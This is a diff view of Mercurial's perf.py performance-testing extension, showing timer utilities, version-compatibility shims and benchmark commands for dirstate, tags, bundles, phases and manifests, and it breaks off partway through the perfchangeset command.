util: teach lrucachedict to enforce a max total cost...
Gregory Szorc
r39604:842cd0bd default
@@ -1,1977 +1,2024 @@
1 1 # perf.py - performance test routines
2 2 '''helper extension to measure performance'''
3 3
4 4 # "historical portability" policy of perf.py:
5 5 #
6 6 # We have to do:
7 7 # - make perf.py "loadable" with as wide a range of Mercurial versions as possible
8 8 # This doesn't mean that perf commands work correctly with every such Mercurial.
9 9 # BTW, perf.py itself has been available since 1.1 (or eb240755386d).
10 10 # - make historical perf commands work correctly with as wide a range of
11 11 # Mercurial versions as possible
12 12 #
13 13 # We should do, if possible with reasonable cost:
14 14 # - make recent perf commands for historical features work correctly
15 15 # with early Mercurial
16 16 #
17 17 # We don't have to do:
18 18 # - make perf commands for recent features work correctly with early
19 19 # Mercurial
20 20
21 21 from __future__ import absolute_import
22 22 import functools
23 23 import gc
24 24 import os
25 25 import random
26 26 import struct
27 27 import sys
28 28 import threading
29 29 import time
30 30 from mercurial import (
31 31 changegroup,
32 32 cmdutil,
33 33 commands,
34 34 copies,
35 35 error,
36 36 extensions,
37 37 mdiff,
38 38 merge,
39 39 revlog,
40 40 util,
41 41 )
42 42
43 43 # for "historical portability":
44 44 # try to import modules separately (in dict order), and ignore
45 45 # failure, because these aren't available with early Mercurial
46 46 try:
47 47 from mercurial import branchmap # since 2.5 (or bcee63733aad)
48 48 except ImportError:
49 49 pass
50 50 try:
51 51 from mercurial import obsolete # since 2.3 (or ad0d6c2b3279)
52 52 except ImportError:
53 53 pass
54 54 try:
55 55 from mercurial import registrar # since 3.7 (or 37d50250b696)
56 56 dir(registrar) # forcibly load it
57 57 except ImportError:
58 58 registrar = None
59 59 try:
60 60 from mercurial import repoview # since 2.5 (or 3a6ddacb7198)
61 61 except ImportError:
62 62 pass
63 63 try:
64 64 from mercurial import scmutil # since 1.9 (or 8b252e826c68)
65 65 except ImportError:
66 66 pass
67 67 try:
68 68 from mercurial import pycompat
69 69 getargspec = pycompat.getargspec # added to module after 4.5
70 70 except (ImportError, AttributeError):
71 71 import inspect
72 72 getargspec = inspect.getargspec
73 73
74 74 try:
75 75 # 4.7+
76 76 queue = pycompat.queue.Queue
77 77 except (AttributeError, ImportError):
78 78 # <4.7.
79 79 try:
80 80 queue = pycompat.queue
81 81 except (AttributeError, ImportError):
82 82 queue = util.queue
83 83
84 84 try:
85 85 from mercurial import logcmdutil
86 86 makelogtemplater = logcmdutil.maketemplater
87 87 except (AttributeError, ImportError):
88 88 try:
89 89 makelogtemplater = cmdutil.makelogtemplater
90 90 except (AttributeError, ImportError):
91 91 makelogtemplater = None
92 92
93 93 # for "historical portability":
94 94 # define util.safehasattr forcibly, because util.safehasattr has been
95 95 # available since 1.9.3 (or 94b200a11cf7)
96 96 _undefined = object()
97 97 def safehasattr(thing, attr):
98 98 return getattr(thing, attr, _undefined) is not _undefined
99 99 setattr(util, 'safehasattr', safehasattr)
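# A quick sanity sketch of the semantics above: only a genuinely missing
# attribute maps to False, e.g.
#   safehasattr([], 'append')     -> True
#   safehasattr(object(), 'nope') -> False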
100 100
101 101 # for "historical portability":
102 102 # define util.timer forcibly, because util.timer has been available
103 103 # since ae5d60bb70c9
104 104 if safehasattr(time, 'perf_counter'):
105 105 util.timer = time.perf_counter
106 106 elif os.name == b'nt':
107 107 util.timer = time.clock
108 108 else:
109 109 util.timer = time.time
110 110
111 111 # for "historical portability":
112 112 # use locally defined empty option list, if formatteropts isn't
113 113 # available, because commands.formatteropts has been available since
114 114 # 3.2 (or 7a7eed5176a4), even though formatting itself has been
115 115 # available since 2.2 (or ae5f92e154d3)
116 116 formatteropts = getattr(cmdutil, "formatteropts",
117 117 getattr(commands, "formatteropts", []))
118 118
119 119 # for "historical portability":
120 120 # use locally defined option list, if debugrevlogopts isn't available,
121 121 # because commands.debugrevlogopts has been available since 3.7 (or
122 122 # 5606f7d0d063), even though cmdutil.openrevlog() has been available
123 123 # since 1.9 (or a79fea6b3e77).
124 124 revlogopts = getattr(cmdutil, "debugrevlogopts",
125 125 getattr(commands, "debugrevlogopts", [
126 126 (b'c', b'changelog', False, (b'open changelog')),
127 127 (b'm', b'manifest', False, (b'open manifest')),
128 128 (b'', b'dir', False, (b'open directory manifest')),
129 129 ]))
130 130
131 131 cmdtable = {}
132 132
133 133 # for "historical portability":
134 134 # define parsealiases locally, because cmdutil.parsealiases has been
135 135 # available since 1.5 (or 6252852b4332)
136 136 def parsealiases(cmd):
137 137 return cmd.lstrip(b"^").split(b"|")
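# A worked example of the parsing above (illustrative):
#   parsealiases(b'^log|history') -> [b'log', b'history']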
138 138
139 139 if safehasattr(registrar, 'command'):
140 140 command = registrar.command(cmdtable)
141 141 elif safehasattr(cmdutil, 'command'):
142 142 command = cmdutil.command(cmdtable)
143 143 if b'norepo' not in getargspec(command).args:
144 144 # for "historical portability":
145 145 # wrap original cmdutil.command, because "norepo" option has
146 146 # been available since 3.1 (or 75a96326cecb)
147 147 _command = command
148 148 def command(name, options=(), synopsis=None, norepo=False):
149 149 if norepo:
150 150 commands.norepo += b' %s' % b' '.join(parsealiases(name))
151 151 return _command(name, list(options), synopsis)
152 152 else:
153 153 # for "historical portability":
154 154 # define "@command" annotation locally, because cmdutil.command
155 155 # has been available since 1.9 (or 2daa5179e73f)
156 156 def command(name, options=(), synopsis=None, norepo=False):
157 157 def decorator(func):
158 158 if synopsis:
159 159 cmdtable[name] = func, list(options), synopsis
160 160 else:
161 161 cmdtable[name] = func, list(options)
162 162 if norepo:
163 163 commands.norepo += b' %s' % b' '.join(parsealiases(name))
164 164 return func
165 165 return decorator
166 166
167 167 try:
168 168 import mercurial.registrar
169 169 import mercurial.configitems
170 170 configtable = {}
171 171 configitem = mercurial.registrar.configitem(configtable)
172 172 configitem(b'perf', b'presleep',
173 173 default=mercurial.configitems.dynamicdefault,
174 174 )
175 175 configitem(b'perf', b'stub',
176 176 default=mercurial.configitems.dynamicdefault,
177 177 )
178 178 configitem(b'perf', b'parentscount',
179 179 default=mercurial.configitems.dynamicdefault,
180 180 )
181 181 configitem(b'perf', b'all-timing',
182 182 default=mercurial.configitems.dynamicdefault,
183 183 )
184 184 except (ImportError, AttributeError):
185 185 pass
186 186
187 187 def getlen(ui):
188 188 if ui.configbool(b"perf", b"stub", False):
189 189 return lambda x: 1
190 190 return len
191 191
192 192 def gettimer(ui, opts=None):
193 193 """return a timer function and formatter: (timer, formatter)
194 194
195 195 This function exists to gather the creation of formatter in a single
196 196 place instead of duplicating it in all performance commands."""
197 197
198 198 # enforce an idle period before execution to counteract power management
199 199 # experimental config: perf.presleep
200 200 time.sleep(getint(ui, b"perf", b"presleep", 1))
201 201
202 202 if opts is None:
203 203 opts = {}
204 204 # redirect all to stderr unless buffer api is in use
205 205 if not ui._buffers:
206 206 ui = ui.copy()
207 207 uifout = safeattrsetter(ui, b'fout', ignoremissing=True)
208 208 if uifout:
209 209 # for "historical portability":
210 210 # ui.fout/ferr have been available since 1.9 (or 4e1ccd4c2b6d)
211 211 uifout.set(ui.ferr)
212 212
213 213 # get a formatter
214 214 uiformatter = getattr(ui, 'formatter', None)
215 215 if uiformatter:
216 216 fm = uiformatter(b'perf', opts)
217 217 else:
218 218 # for "historical portability":
219 219 # define formatter locally, because ui.formatter has been
220 220 # available since 2.2 (or ae5f92e154d3)
221 221 from mercurial import node
222 222 class defaultformatter(object):
223 223 """Minimized composition of baseformatter and plainformatter
224 224 """
225 225 def __init__(self, ui, topic, opts):
226 226 self._ui = ui
227 227 if ui.debugflag:
228 228 self.hexfunc = node.hex
229 229 else:
230 230 self.hexfunc = node.short
231 231 def __nonzero__(self):
232 232 return False
233 233 __bool__ = __nonzero__
234 234 def startitem(self):
235 235 pass
236 236 def data(self, **data):
237 237 pass
238 238 def write(self, fields, deftext, *fielddata, **opts):
239 239 self._ui.write(deftext % fielddata, **opts)
240 240 def condwrite(self, cond, fields, deftext, *fielddata, **opts):
241 241 if cond:
242 242 self._ui.write(deftext % fielddata, **opts)
243 243 def plain(self, text, **opts):
244 244 self._ui.write(text, **opts)
245 245 def end(self):
246 246 pass
247 247 fm = defaultformatter(ui, b'perf', opts)
248 248
249 249 # stub function, runs code only once instead of in a loop
250 250 # experimental config: perf.stub
251 251 if ui.configbool(b"perf", b"stub", False):
252 252 return functools.partial(stub_timer, fm), fm
253 253
254 254 # experimental config: perf.all-timing
255 255 displayall = ui.configbool(b"perf", b"all-timing", False)
256 256 return functools.partial(_timer, fm, displayall=displayall), fm
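# Typical call pattern, as used by the perf commands below (a sketch; the
# benchmarked callable is whatever a command wants to measure):
#
#   timer, fm = gettimer(ui, opts)
#   timer(lambda: len(repo.heads()), title=b'heads')
#   fm.end()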
257 257
258 258 def stub_timer(fm, func, title=None):
259 259 func()
260 260
261 261 def _timer(fm, func, title=None, displayall=False):
262 262 gc.collect()
263 263 results = []
264 264 begin = util.timer()
265 265 count = 0
266 266 while True:
267 267 ostart = os.times()
268 268 cstart = util.timer()
269 269 r = func()
270 270 cstop = util.timer()
271 271 ostop = os.times()
272 272 count += 1
273 273 a, b = ostart, ostop
274 274 results.append((cstop - cstart, b[0] - a[0], b[1]-a[1]))
275 275 if cstop - begin > 3 and count >= 100: # >3s elapsed and >=100 samples
276 276 break
277 277 if cstop - begin > 10 and count >= 3: # >10s elapsed and >=3 samples
278 278 break
279 279
280 280 fm.startitem()
281 281
282 282 if title:
283 283 fm.write(b'title', b'! %s\n', title)
284 284 if r:
285 285 fm.write(b'result', b'! result: %s\n', r)
286 286 def display(role, entry):
287 287 prefix = b''
288 288 if role != b'best':
289 289 prefix = b'%s.' % role
290 290 fm.plain(b'!')
291 291 fm.write(prefix + b'wall', b' wall %f', entry[0])
292 292 fm.write(prefix + b'comb', b' comb %f', entry[1] + entry[2])
293 293 fm.write(prefix + b'user', b' user %f', entry[1])
294 294 fm.write(prefix + b'sys', b' sys %f', entry[2])
295 295 fm.write(prefix + b'count', b' (%s of %d)', role, count)
296 296 fm.plain(b'\n')
297 297 results.sort()
298 298 min_val = results[0]
299 299 display(b'best', min_val)
300 300 if displayall:
301 301 max_val = results[-1]
302 302 display(b'max', max_val)
303 303 avg = tuple([sum(x) / count for x in zip(*results)])
304 304 display(b'avg', avg)
305 305 median = results[len(results) // 2]
306 306 display(b'median', median)
307 307
308 308 # utilities for historical portability
309 309
310 310 def getint(ui, section, name, default):
311 311 # for "historical portability":
312 312 # ui.configint has been available since 1.9 (or fa2b596db182)
313 313 v = ui.config(section, name, None)
314 314 if v is None:
315 315 return default
316 316 try:
317 317 return int(v)
318 318 except ValueError:
319 319 raise error.ConfigError((b"%s.%s is not an integer ('%s')")
320 320 % (section, name, v))
321 321
322 322 def safeattrsetter(obj, name, ignoremissing=False):
323 323 """Ensure that 'obj' has 'name' attribute before subsequent setattr
324 324
325 325 This function aborts if 'obj' doesn't have the 'name' attribute at
326 326 runtime. This avoids overlooking a future removal of the attribute,
327 327 which would silently break the assumptions of performance measurement.
328 328
329 329 This function returns an object used to (1) assign a new value to the
330 330 attribute and (2) restore the attribute's original value.
331 331
332 332 If 'ignoremissing' is true, a missing 'name' attribute doesn't cause
333 333 an abort, and this function returns None. This is useful for examining
334 334 an attribute that isn't guaranteed to exist in all Mercurial
335 335 versions.
336 336 """
337 337 if not util.safehasattr(obj, name):
338 338 if ignoremissing:
339 339 return None
340 340 raise error.Abort((b"missing attribute %s of %s might break assumption"
341 341 b" of performance measurement") % (name, obj))
342 342
343 343 origvalue = getattr(obj, name)
344 344 class attrutil(object):
345 345 def set(self, newvalue):
346 346 setattr(obj, name, newvalue)
347 347 def restore(self):
348 348 setattr(obj, name, origvalue)
349 349
350 350 return attrutil()
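# Illustrative use, mirroring gettimer() above (a sketch):
#
#   uifout = safeattrsetter(ui, b'fout', ignoremissing=True)
#   if uifout:
#       uifout.set(ui.ferr)   # assign a new value ...
#       uifout.restore()      # ... and put the original back later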
351 351
352 352 # utilities to examine each internal API changes
353 353
354 354 def getbranchmapsubsettable():
355 355 # for "historical portability":
356 356 # subsettable is defined in:
357 357 # - branchmap since 2.9 (or 175c6fd8cacc)
358 358 # - repoview since 2.5 (or 59a9f18d4587)
359 359 for mod in (branchmap, repoview):
360 360 subsettable = getattr(mod, 'subsettable', None)
361 361 if subsettable:
362 362 return subsettable
363 363
364 364 # bisecting in bcee63733aad::59a9f18d4587 can reach here (both
365 365 # branchmap and repoview modules exist, but subsettable attribute
366 366 # doesn't)
367 367 raise error.Abort((b"perfbranchmap not available with this Mercurial"),
368 368 hint=b"use 2.5 or later")
369 369
370 370 def getsvfs(repo):
371 371 """Return appropriate object to access files under .hg/store
372 372 """
373 373 # for "historical portability":
374 374 # repo.svfs has been available since 2.3 (or 7034365089bf)
375 375 svfs = getattr(repo, 'svfs', None)
376 376 if svfs:
377 377 return svfs
378 378 else:
379 379 return getattr(repo, 'sopener')
380 380
381 381 def getvfs(repo):
382 382 """Return appropriate object to access files under .hg
383 383 """
384 384 # for "historical portability":
385 385 # repo.vfs has been available since 2.3 (or 7034365089bf)
386 386 vfs = getattr(repo, 'vfs', None)
387 387 if vfs:
388 388 return vfs
389 389 else:
390 390 return getattr(repo, 'opener')
391 391
392 392 def repocleartagscachefunc(repo):
393 393 """Return the function to clear tags cache according to repo internal API
394 394 """
395 395 if util.safehasattr(repo, b'_tagscache'): # since 2.0 (or 9dca7653b525)
396 396 # in this case, setattr(repo, '_tagscache', None) or so isn't
397 397 # correct way to clear tags cache, because existing code paths
398 398 # expect _tagscache to be a structured object.
399 399 def clearcache():
400 400 # _tagscache has been filteredpropertycache since 2.5 (or
401 401 # 98c867ac1330), and delattr() can't work in such case
402 402 if b'_tagscache' in vars(repo):
403 403 del repo.__dict__[b'_tagscache']
404 404 return clearcache
405 405
406 406 repotags = safeattrsetter(repo, b'_tags', ignoremissing=True)
407 407 if repotags: # since 1.4 (or 5614a628d173)
408 408 return lambda : repotags.set(None)
409 409
410 410 repotagscache = safeattrsetter(repo, b'tagscache', ignoremissing=True)
411 411 if repotagscache: # since 0.6 (or d7df759d0e97)
412 412 return lambda : repotagscache.set(None)
413 413
414 414 # Mercurial earlier than 0.6 (or d7df759d0e97) logically reaches
415 415 # this point, but it isn't so problematic, because:
416 416 # - repo.tags of such Mercurial isn't "callable", and repo.tags()
417 417 # in perftags() causes failure soon
418 418 # - perf.py itself has been available since 1.1 (or eb240755386d)
419 419 raise error.Abort((b"tags API of this hg command is unknown"))
420 420
421 421 # utilities to clear cache
422 422
423 423 def clearfilecache(repo, attrname):
424 424 unfi = repo.unfiltered()
425 425 if attrname in vars(unfi):
426 426 delattr(unfi, attrname)
427 427 unfi._filecache.pop(attrname, None)
428 428
429 429 # perf commands
430 430
431 431 @command(b'perfwalk', formatteropts)
432 432 def perfwalk(ui, repo, *pats, **opts):
433 433 timer, fm = gettimer(ui, opts)
434 434 m = scmutil.match(repo[None], pats, {})
435 435 timer(lambda: len(list(repo.dirstate.walk(m, subrepos=[], unknown=True,
436 436 ignored=False))))
437 437 fm.end()
438 438
439 439 @command(b'perfannotate', formatteropts)
440 440 def perfannotate(ui, repo, f, **opts):
441 441 timer, fm = gettimer(ui, opts)
442 442 fc = repo[b'.'][f]
443 443 timer(lambda: len(fc.annotate(True)))
444 444 fm.end()
445 445
446 446 @command(b'perfstatus',
447 447 [(b'u', b'unknown', False,
448 448 b'ask status to look for unknown files')] + formatteropts)
449 449 def perfstatus(ui, repo, **opts):
450 450 #m = match.always(repo.root, repo.getcwd())
451 451 #timer(lambda: sum(map(len, repo.dirstate.status(m, [], False, False,
452 452 # False))))
453 453 timer, fm = gettimer(ui, opts)
454 454 timer(lambda: sum(map(len, repo.status(unknown=opts[b'unknown']))))
455 455 fm.end()
456 456
457 457 @command(b'perfaddremove', formatteropts)
458 458 def perfaddremove(ui, repo, **opts):
459 459 timer, fm = gettimer(ui, opts)
460 460 try:
461 461 oldquiet = repo.ui.quiet
462 462 repo.ui.quiet = True
463 463 matcher = scmutil.match(repo[None])
464 464 opts[b'dry_run'] = True
465 465 timer(lambda: scmutil.addremove(repo, matcher, b"", opts))
466 466 finally:
467 467 repo.ui.quiet = oldquiet
468 468 fm.end()
469 469
470 470 def clearcaches(cl):
471 471 # behave somewhat consistently across internal API changes
472 472 if util.safehasattr(cl, b'clearcaches'):
473 473 cl.clearcaches()
474 474 elif util.safehasattr(cl, b'_nodecache'):
475 475 from mercurial.node import nullid, nullrev
476 476 cl._nodecache = {nullid: nullrev}
477 477 cl._nodepos = None
478 478
479 479 @command(b'perfheads', formatteropts)
480 480 def perfheads(ui, repo, **opts):
481 481 timer, fm = gettimer(ui, opts)
482 482 cl = repo.changelog
483 483 def d():
484 484 len(cl.headrevs())
485 485 clearcaches(cl)
486 486 timer(d)
487 487 fm.end()
488 488
489 489 @command(b'perftags', formatteropts)
490 490 def perftags(ui, repo, **opts):
491 491 import mercurial.changelog
492 492 import mercurial.manifest
493 493 timer, fm = gettimer(ui, opts)
494 494 svfs = getsvfs(repo)
495 495 repocleartagscache = repocleartagscachefunc(repo)
496 496 def t():
497 497 repo.changelog = mercurial.changelog.changelog(svfs)
498 498 repo.manifestlog = mercurial.manifest.manifestlog(svfs, repo)
499 499 repocleartagscache()
500 500 return len(repo.tags())
501 501 timer(t)
502 502 fm.end()
503 503
504 504 @command(b'perfancestors', formatteropts)
505 505 def perfancestors(ui, repo, **opts):
506 506 timer, fm = gettimer(ui, opts)
507 507 heads = repo.changelog.headrevs()
508 508 def d():
509 509 for a in repo.changelog.ancestors(heads):
510 510 pass
511 511 timer(d)
512 512 fm.end()
513 513
514 514 @command(b'perfancestorset', formatteropts)
515 515 def perfancestorset(ui, repo, revset, **opts):
516 516 timer, fm = gettimer(ui, opts)
517 517 revs = repo.revs(revset)
518 518 heads = repo.changelog.headrevs()
519 519 def d():
520 520 s = repo.changelog.ancestors(heads)
521 521 for rev in revs:
522 522 rev in s
523 523 timer(d)
524 524 fm.end()
525 525
526 526 @command(b'perfbookmarks', formatteropts)
527 527 def perfbookmarks(ui, repo, **opts):
528 528 """benchmark parsing bookmarks from disk to memory"""
529 529 timer, fm = gettimer(ui, opts)
530 530 def d():
531 531 clearfilecache(repo, b'_bookmarks')
532 532 repo._bookmarks
533 533 timer(d)
534 534 fm.end()
535 535
536 536 @command(b'perfbundleread', formatteropts, b'BUNDLE')
537 537 def perfbundleread(ui, repo, bundlepath, **opts):
538 538 """Benchmark reading of bundle files.
539 539
540 540 This command is meant to isolate the I/O part of bundle reading as
541 541 much as possible.
542 542 """
543 543 from mercurial import (
544 544 bundle2,
545 545 exchange,
546 546 streamclone,
547 547 )
548 548
549 549 def makebench(fn):
550 550 def run():
551 551 with open(bundlepath, b'rb') as fh:
552 552 bundle = exchange.readbundle(ui, fh, bundlepath)
553 553 fn(bundle)
554 554
555 555 return run
556 556
557 557 def makereadnbytes(size):
558 558 def run():
559 559 with open(bundlepath, b'rb') as fh:
560 560 bundle = exchange.readbundle(ui, fh, bundlepath)
561 561 while bundle.read(size):
562 562 pass
563 563
564 564 return run
565 565
566 566 def makestdioread(size):
567 567 def run():
568 568 with open(bundlepath, b'rb') as fh:
569 569 while fh.read(size):
570 570 pass
571 571
572 572 return run
573 573
574 574 # bundle1
575 575
576 576 def deltaiter(bundle):
577 577 for delta in bundle.deltaiter():
578 578 pass
579 579
580 580 def iterchunks(bundle):
581 581 for chunk in bundle.getchunks():
582 582 pass
583 583
584 584 # bundle2
585 585
586 586 def forwardchunks(bundle):
587 587 for chunk in bundle._forwardchunks():
588 588 pass
589 589
590 590 def iterparts(bundle):
591 591 for part in bundle.iterparts():
592 592 pass
593 593
594 594 def iterpartsseekable(bundle):
595 595 for part in bundle.iterparts(seekable=True):
596 596 pass
597 597
598 598 def seek(bundle):
599 599 for part in bundle.iterparts(seekable=True):
600 600 part.seek(0, os.SEEK_END)
601 601
602 602 def makepartreadnbytes(size):
603 603 def run():
604 604 with open(bundlepath, b'rb') as fh:
605 605 bundle = exchange.readbundle(ui, fh, bundlepath)
606 606 for part in bundle.iterparts():
607 607 while part.read(size):
608 608 pass
609 609
610 610 return run
611 611
612 612 benches = [
613 613 (makestdioread(8192), b'read(8k)'),
614 614 (makestdioread(16384), b'read(16k)'),
615 615 (makestdioread(32768), b'read(32k)'),
616 616 (makestdioread(131072), b'read(128k)'),
617 617 ]
618 618
619 619 with open(bundlepath, b'rb') as fh:
620 620 bundle = exchange.readbundle(ui, fh, bundlepath)
621 621
622 622 if isinstance(bundle, changegroup.cg1unpacker):
623 623 benches.extend([
624 624 (makebench(deltaiter), b'cg1 deltaiter()'),
625 625 (makebench(iterchunks), b'cg1 getchunks()'),
626 626 (makereadnbytes(8192), b'cg1 read(8k)'),
627 627 (makereadnbytes(16384), b'cg1 read(16k)'),
628 628 (makereadnbytes(32768), b'cg1 read(32k)'),
629 629 (makereadnbytes(131072), b'cg1 read(128k)'),
630 630 ])
631 631 elif isinstance(bundle, bundle2.unbundle20):
632 632 benches.extend([
633 633 (makebench(forwardchunks), b'bundle2 forwardchunks()'),
634 634 (makebench(iterparts), b'bundle2 iterparts()'),
635 635 (makebench(iterpartsseekable), b'bundle2 iterparts() seekable'),
636 636 (makebench(seek), b'bundle2 part seek()'),
637 637 (makepartreadnbytes(8192), b'bundle2 part read(8k)'),
638 638 (makepartreadnbytes(16384), b'bundle2 part read(16k)'),
639 639 (makepartreadnbytes(32768), b'bundle2 part read(32k)'),
640 640 (makepartreadnbytes(131072), b'bundle2 part read(128k)'),
641 641 ])
642 642 elif isinstance(bundle, streamclone.streamcloneapplier):
643 643 raise error.Abort(b'stream clone bundles not supported')
644 644 else:
645 645 raise error.Abort(b'unhandled bundle type: %s' % type(bundle))
646 646
647 647 for fn, title in benches:
648 648 timer, fm = gettimer(ui, opts)
649 649 timer(fn, title=title)
650 650 fm.end()
651 651
652 652 @command(b'perfchangegroupchangelog', formatteropts +
653 653 [(b'', b'version', b'02', b'changegroup version'),
654 654 (b'r', b'rev', b'', b'revisions to add to changegroup')])
655 655 def perfchangegroupchangelog(ui, repo, version=b'02', rev=None, **opts):
656 656 """Benchmark producing a changelog group for a changegroup.
657 657
658 658 This measures the time spent processing the changelog during a
659 659 bundle operation. This occurs during `hg bundle` and on a server
660 660 processing a `getbundle` wire protocol request (this handles
661 661 clones and pulls).
662 662
663 663 By default, all revisions are added to the changegroup.
664 664 """
665 665 cl = repo.changelog
666 666 nodes = [cl.lookup(r) for r in repo.revs(rev or b'all()')]
667 667 bundler = changegroup.getbundler(version, repo)
668 668
669 669 def d():
670 670 state, chunks = bundler._generatechangelog(cl, nodes)
671 671 for chunk in chunks:
672 672 pass
673 673
674 674 timer, fm = gettimer(ui, opts)
675 675
676 676 # Terminal printing can interfere with timing. So disable it.
677 677 with ui.configoverride({(b'progress', b'disable'): True}):
678 678 timer(d)
679 679
680 680 fm.end()
681 681
682 682 @command(b'perfdirs', formatteropts)
683 683 def perfdirs(ui, repo, **opts):
684 684 timer, fm = gettimer(ui, opts)
685 685 dirstate = repo.dirstate
686 686 b'a' in dirstate
687 687 def d():
688 688 dirstate.hasdir(b'a')
689 689 del dirstate._map._dirs
690 690 timer(d)
691 691 fm.end()
692 692
693 693 @command(b'perfdirstate', formatteropts)
694 694 def perfdirstate(ui, repo, **opts):
695 695 timer, fm = gettimer(ui, opts)
696 696 b"a" in repo.dirstate
697 697 def d():
698 698 repo.dirstate.invalidate()
699 699 b"a" in repo.dirstate
700 700 timer(d)
701 701 fm.end()
702 702
703 703 @command(b'perfdirstatedirs', formatteropts)
704 704 def perfdirstatedirs(ui, repo, **opts):
705 705 timer, fm = gettimer(ui, opts)
706 706 b"a" in repo.dirstate
707 707 def d():
708 708 repo.dirstate.hasdir(b"a")
709 709 del repo.dirstate._map._dirs
710 710 timer(d)
711 711 fm.end()
712 712
713 713 @command(b'perfdirstatefoldmap', formatteropts)
714 714 def perfdirstatefoldmap(ui, repo, **opts):
715 715 timer, fm = gettimer(ui, opts)
716 716 dirstate = repo.dirstate
717 717 b'a' in dirstate
718 718 def d():
719 719 dirstate._map.filefoldmap.get(b'a')
720 720 del dirstate._map.filefoldmap
721 721 timer(d)
722 722 fm.end()
723 723
724 724 @command(b'perfdirfoldmap', formatteropts)
725 725 def perfdirfoldmap(ui, repo, **opts):
726 726 timer, fm = gettimer(ui, opts)
727 727 dirstate = repo.dirstate
728 728 b'a' in dirstate
729 729 def d():
730 730 dirstate._map.dirfoldmap.get(b'a')
731 731 del dirstate._map.dirfoldmap
732 732 del dirstate._map._dirs
733 733 timer(d)
734 734 fm.end()
735 735
736 736 @command(b'perfdirstatewrite', formatteropts)
737 737 def perfdirstatewrite(ui, repo, **opts):
738 738 timer, fm = gettimer(ui, opts)
739 739 ds = repo.dirstate
740 740 b"a" in ds
741 741 def d():
742 742 ds._dirty = True
743 743 ds.write(repo.currenttransaction())
744 744 timer(d)
745 745 fm.end()
746 746
747 747 @command(b'perfmergecalculate',
748 748 [(b'r', b'rev', b'.', b'rev to merge against')] + formatteropts)
749 749 def perfmergecalculate(ui, repo, rev, **opts):
750 750 timer, fm = gettimer(ui, opts)
751 751 wctx = repo[None]
752 752 rctx = scmutil.revsingle(repo, rev, rev)
753 753 ancestor = wctx.ancestor(rctx)
754 754 # we don't want working dir files to be stat'd in the benchmark, so prime
755 755 # that cache
756 756 wctx.dirty()
757 757 def d():
758 758 # acceptremote is True because we don't want prompts in the middle of
759 759 # our benchmark
760 760 merge.calculateupdates(repo, wctx, rctx, [ancestor], False, False,
761 761 acceptremote=True, followcopies=True)
762 762 timer(d)
763 763 fm.end()
764 764
765 765 @command(b'perfpathcopies', [], b"REV REV")
766 766 def perfpathcopies(ui, repo, rev1, rev2, **opts):
767 767 timer, fm = gettimer(ui, opts)
768 768 ctx1 = scmutil.revsingle(repo, rev1, rev1)
769 769 ctx2 = scmutil.revsingle(repo, rev2, rev2)
770 770 def d():
771 771 copies.pathcopies(ctx1, ctx2)
772 772 timer(d)
773 773 fm.end()
774 774
775 775 @command(b'perfphases',
776 776 [(b'', b'full', False, b'include file reading time too'),
777 777 ], b"")
778 778 def perfphases(ui, repo, **opts):
779 779 """benchmark phasesets computation"""
780 780 timer, fm = gettimer(ui, opts)
781 781 _phases = repo._phasecache
782 782 full = opts.get(b'full')
783 783 def d():
784 784 phases = _phases
785 785 if full:
786 786 clearfilecache(repo, b'_phasecache')
787 787 phases = repo._phasecache
788 788 phases.invalidate()
789 789 phases.loadphaserevs(repo)
790 790 timer(d)
791 791 fm.end()
792 792
793 793 @command(b'perfphasesremote',
794 794 [], b"[DEST]")
795 795 def perfphasesremote(ui, repo, dest=None, **opts):
796 796 """benchmark the time needed to analyse the phases of the remote server"""
797 797 from mercurial.node import (
798 798 bin,
799 799 )
800 800 from mercurial import (
801 801 exchange,
802 802 hg,
803 803 phases,
804 804 )
805 805 timer, fm = gettimer(ui, opts)
806 806
807 807 path = ui.paths.getpath(dest, default=(b'default-push', b'default'))
808 808 if not path:
809 809 raise error.Abort((b'default repository not configured!'),
810 810 hint=(b"see 'hg help config.paths'"))
811 811 dest = path.pushloc or path.loc
812 812 branches = (path.branch, opts.get(b'branch') or [])
813 813 ui.status((b'analysing phase of %s\n') % util.hidepassword(dest))
814 814 revs, checkout = hg.addbranchrevs(repo, repo, branches, opts.get(b'rev'))
815 815 other = hg.peer(repo, opts, dest)
816 816
817 817 # easier to perform discovery through the operation
818 818 op = exchange.pushoperation(repo, other)
819 819 exchange._pushdiscoverychangeset(op)
820 820
821 821 remotesubset = op.fallbackheads
822 822
823 823 with other.commandexecutor() as e:
824 824 remotephases = e.callcommand(b'listkeys',
825 825 {b'namespace': b'phases'}).result()
826 826 del other
827 827 publishing = remotephases.get(b'publishing', False)
828 828 if publishing:
829 829 ui.status((b'publishing: yes\n'))
830 830 else:
831 831 ui.status((b'publishing: no\n'))
832 832
833 833 nodemap = repo.changelog.nodemap
834 834 nonpublishroots = 0
835 835 for nhex, phase in remotephases.iteritems():
836 836 if nhex == b'publishing': # ignore data related to publish option
837 837 continue
838 838 node = bin(nhex)
839 839 if node in nodemap and int(phase):
840 840 nonpublishroots += 1
841 841 ui.status((b'number of roots: %d\n') % len(remotephases))
842 842 ui.status((b'number of known non public roots: %d\n') % nonpublishroots)
843 843 def d():
844 844 phases.remotephasessummary(repo,
845 845 remotesubset,
846 846 remotephases)
847 847 timer(d)
848 848 fm.end()
849 849
850 850 @command(b'perfmanifest',[
851 851 (b'm', b'manifest-rev', False, b'Look up a manifest node revision'),
852 852 (b'', b'clear-disk', False, b'clear on-disk caches too'),
853 853 ], b'REV|NODE')
854 854 def perfmanifest(ui, repo, rev, manifest_rev=False, clear_disk=False, **opts):
855 855 """benchmark the time to read a manifest from disk and return a usable
856 856 dict-like object
857 857
858 858 Manifest caches are cleared before retrieval."""
859 859 timer, fm = gettimer(ui, opts)
860 860 if not manifest_rev:
861 861 ctx = scmutil.revsingle(repo, rev, rev)
862 862 t = ctx.manifestnode()
863 863 else:
864 864 from mercurial.node import bin
865 865
866 866 if len(rev) == 40:
867 867 t = bin(rev)
868 868 else:
869 869 try:
870 870 rev = int(rev)
871 871
872 872 if util.safehasattr(repo.manifestlog, b'getstorage'):
873 873 t = repo.manifestlog.getstorage(b'').node(rev)
874 874 else:
875 875 t = repo.manifestlog._revlog.lookup(rev)
876 876 except ValueError:
877 877 raise error.Abort(b'manifest revision must be integer or full '
878 878 b'node')
879 879 def d():
880 880 repo.manifestlog.clearcaches(clear_persisted_data=clear_disk)
881 881 repo.manifestlog[t].read()
882 882 timer(d)
883 883 fm.end()
884 884
885 885 @command(b'perfchangeset', formatteropts)
886 886 def perfchangeset(ui, repo, rev, **opts):
887 887 timer, fm = gettimer(ui, opts)
888 888 n = scmutil.revsingle(repo, rev).node()
889 889 def d():
